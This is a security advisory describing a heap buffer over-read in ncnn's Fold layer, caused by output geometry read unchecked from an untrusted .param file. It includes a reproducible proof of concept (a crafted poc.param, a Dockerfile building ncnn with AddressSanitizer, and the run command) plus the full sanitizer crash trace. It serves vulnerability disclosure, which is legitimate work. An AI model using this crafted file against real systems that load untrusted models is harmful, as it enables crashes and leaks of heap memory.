Heap Buffer Over-Read in Fold Shape Inference
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/fold.cpp:84 in Fold::forward
Sanitizer verdict: heap-buffer-overflow
Summary
Fold derives the number of input columns it will consume from its own attacker-controlled output geometry rather than from the actual input tensor, so a .param file that declares a large output_w against a tiny input makes the col2im loop walk hundreds of floats past the input allocation. An attacker who can get tools/ncnnoptimize to process the file — no binary weights are needed, the PoC passes null as the model — terminates the optimizer during ModelWriter::shape_inference() and, on a non-instrumented build, accumulates adjacent heap data into the output tensor.
Detail
The untrusted fields are Fold parameter keys 20 and 21 (output_w / output_h) together with the kernel, stride, dilation and pad keys, all read verbatim in Fold::load_param. Fold::forward computes the output extent from those values and then back-computes how many input columns and rows it should read, with a comment acknowledging that the relationship is merely assumed:
// src/layer/fold.cpp:39
const int outw = output_w + pad_left + pad_right;
const int outh = output_h + pad_top + pad_bottom;
const int inw = (outw - kernel_extent_w) / stride_w + 1;
const int inh = (outh - kernel_extent_h) / stride_h + 1;
// assert inw * inh == size
// src/layer/fold.cpp:80
for (int i = 0; i < inh; i++)
{
for (int j = 0; j < inw; j++)
{
ptr[0] += sptr[0];
ptr += stride_w;
sptr += 1;
}
The assertion is never enforced. sptr is bottom_blob.row(p * maxk) — a pointer into the real input allocation — but the loop trip count inw * inh comes from the forged output geometry, so the two are unrelated.
The PoC's Input input 0 1 data 0=1 1=1 produces a 1x1 tensor: Mat::create(1, 1) at tools/modelwriter.h:389, whose backing block is the 84-byte region in the ASan report (4 usable bytes, cstep padding to 16, a 4-byte refcount, and the 64-byte NCNN_MALLOC_OVERREAD pad). The Fold layer declares 1=1 11=1 (1x1 kernel), unit strides and dilations, zero pads, 20=100 21=1. That gives outw = 100, kernel_extent_w = 1, and inw = (100 - 1) / 1 + 1 = 100, with inh = 1 and channels = 1. The inner loop therefore advances sptr 100 times over a buffer holding one float. Iterations 1 through 20 read the padding and refcount inside the block; at j == 21 the read is at byte offset 84 — exactly 0 bytes after the region — and AddressSanitizer aborts. Larger output_w values scale the over-read arbitrarily.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-over-read-in-fold-shape-inference && cd ncnn-poc-heap-buffer-over-read-in-fold-shape-inference
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'PARAM'
7767517
2 2
Input data 0 1 data 0=1 1=1
Fold fold 1 1 data out 1=1 20=100
PARAM
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000094 at pc 0x63b497278dc4 bp 0x7ffccb700010 sp 0x7ffccb700000
READ of size 4 at 0x50e000000094 thread T0
#0 0x63b497278dc3 in ncnn::Fold::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer/fold.cpp:84
#1 0x63b48e681f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#2 0x63b48e673b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#3 0x63b48e6d39e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#4 0x63b48e5653c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#5 0x63b48e5e2eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#6 0x7ef25982a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x7ef25982a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x63b48e562624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e000000094 is located 0 bytes after 84-byte region [0x50e000000040,0x50e000000094)
allocated by thread T0 here:
#0 0x7ef259ea3f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x63b48e632a4f in fastMalloc /ncnn/src/allocator.h:62
#2 0x63b48e632a4f in ncnn::Mat::create(int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:373
#3 0x63b48e563c6a in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:389
#4 0x63b48e5e2eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#5 0x7ef25982a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#6 0x7ef25982a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x63b48e562624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/layer/fold.cpp:84 in ncnn::Fold::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const
Credit
Zheng Yu @ DepthFirst